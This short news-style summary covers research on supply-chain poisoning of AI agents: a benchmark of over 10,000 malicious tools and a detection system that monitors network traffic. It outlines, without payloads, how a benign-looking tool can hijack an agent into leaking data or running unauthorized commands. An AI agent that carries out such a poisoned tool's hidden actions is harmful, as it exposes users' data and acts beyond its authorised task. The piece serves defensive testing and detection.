AI agents can now be poisoned through their tool suppliers — and we can finally measure it

Researchers built a benchmark of over 10,000 malicious tools designed to hijack AI agents through their supply chain, then created a detection system that watches network traffic instead of scanning tool code. This means companies deploying AI agents can now test whether their defenses actually catch poisoned tools before those tools leak data or execute unauthorized commands.

Until now, AI agent security focused on obvious attacks — bad prompts, unsafe outputs. But as agents increasingly outsource work to third-party tools and servers, the real threat moved to the supply chain itself. A malicious tool looks benign until it executes. The benchmark and detection system flip the asymmetry: defenders can now measure their own blindness. This matters because the cost of a poisoned tool in production is catastrophic — silent data exfiltration, unauthorized transactions, compromised decisions — and there was no way to test for it at scale before.